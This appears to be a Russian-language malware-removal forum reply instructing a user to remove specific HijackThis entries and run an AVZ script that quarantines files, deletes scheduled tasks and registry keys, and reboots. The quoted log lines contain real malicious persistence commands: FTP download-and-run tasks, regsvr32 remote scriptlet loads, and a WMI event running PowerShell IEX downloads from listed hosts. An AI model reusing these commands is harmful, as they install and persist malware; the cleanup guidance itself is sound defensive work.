Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:
Код:
O4 - HKLM\..\Run: [start] = C:\windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O4 - MSConfig\startupreg: start [command] = C:\windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll (HKLM) (2020/01/21)
O4-32 - HKLM\..\Run: [start] = C:\windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2020/08/18) - {1d756c17-80d9-408b-b9c2-823fc7977fb3} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/08/18) - {1d756c17-80d9-408b-b9c2-823fc7977fb3} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/08/18) - {1d756c17-80d9-408b-b9c2-823fc7977fb3} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/08/18) - {1d756c17-80d9-408b-b9c2-823fc7977fb3} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/08/18) - {1d756c17-80d9-408b-b9c2-823fc7977fb3} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\windows\system32\cmd.exe /c echo open ftp.ftp0810.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\windows\system32\cmd.exe /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\windows\system32\cmd.exe /c echo open ftp.ftp0810.ru>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: Registration - C:\Program Files (x86)\Hewlett-Packard\HP Setup\Dependencies\RemEngine.exe Registration ShowMessageTask2D (file missing)
O22 - Task: ok - C:\windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - c:\windows\inf\aspnet\lsma12.exe
O25 - WMI Event: (no consumer) - (no filter) -
O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.0810bye.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
Выполните скрипт в AVZ из папки Autologger:
Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
TerminateProcessByName('c:\windows\syswow64\rundll32.exe');
TerminateProcessByName('c:\windows\temp\conhou.exe');
StopService('46e1875725d27f70');
StopService('46e18e27509e6185');
StopService('46e24abfd8f37c12');
QuarantineFile('C:\Users\ОТ ПБ\appdata\local\oneclick\oneclickapp.64.exe', '');
QuarantineFile('C:\Users\ОТ ПБ\appdata\local\oneclick\oneclickbandhandler.64.exe', '');
QuarantineFile('c:\windows\debug\item.dat', '');
QuarantineFile('c:\windows\debug\ok.dat', '');
QuarantineFile('c:\windows\help\lsmosee.exe', '');
QuarantineFile('C:\Windows\inf\aspnet\lsma12.exe', '');
QuarantineFile('c:\windows\temp\conhos.exe', '');
QuarantineFile('c:\windows\temp\conhou.exe', '');
DeleteFile('a.exe', '64');
DeleteFile('C:\Program Files\DrWeb\dwnetfilter.exe', '64');
DeleteFile('C:\Users\ОТ ПБ\appdata\local\oneclick\oneclickapp.64.exe', '');
DeleteFile('C:\Users\ОТ ПБ\appdata\local\oneclick\oneclickbandhandler.64.exe', '');
DeleteFile('C:\Users\ОТ ПБ\AppData\Local\Temp\Temp1_ROMServer.zip\HookDrv.dll', '64');
DeleteFile('c:\windows\debug\item.dat>', '64');
DeleteFile('c:\windows\debug\item.dat', '');
DeleteFile('c:\windows\debug\item.dat', '64');
DeleteFile('c:\windows\debug\ok.dat', '64');
DeleteFile('c:\windows\help\lsmosee.exe>', '64');
DeleteFile('c:\windows\help\lsmosee.exe', '64');
DeleteFile('C:\Windows\inf\aspnet\lsma12.exe', '');
DeleteFile('c:\windows\inf\aspnet\lsma12.exe', '64');
DeleteFile('c:\windows\temp\conhos.exe', '64');
DeleteFile('c:\windows\temp\conhou.exe', '');
DeleteFile('c:\windows\temp\conhou.exe', '64');
DeleteFileMask('c:\users\от пб\appdata\local\oneclick', '*', false);
DeleteDirectory('c:\users\от пб\appdata\local\oneclick');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start', 'command', '64');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', '32');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', '64');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\mrupdsrv', 'x64');
DeleteSchedulerTask('MicrosoftsWindows');
DeleteSchedulerTask('MicrosoftsWindowsu');
DeleteSchedulerTask('Mysa');
DeleteSchedulerTask('Mysa1');
DeleteSchedulerTask('Mysa2');
DeleteSchedulerTask('Mysa3');
DeleteSchedulerTask('ok');
DeleteSchedulerTask('oka');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 3, 3, true);
RebootWindows(true);
end.
Компьютер перезагрузится.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.
Пролечите систему с помощью KVRT или Dr. Web CureIt! и сделайте новые логи.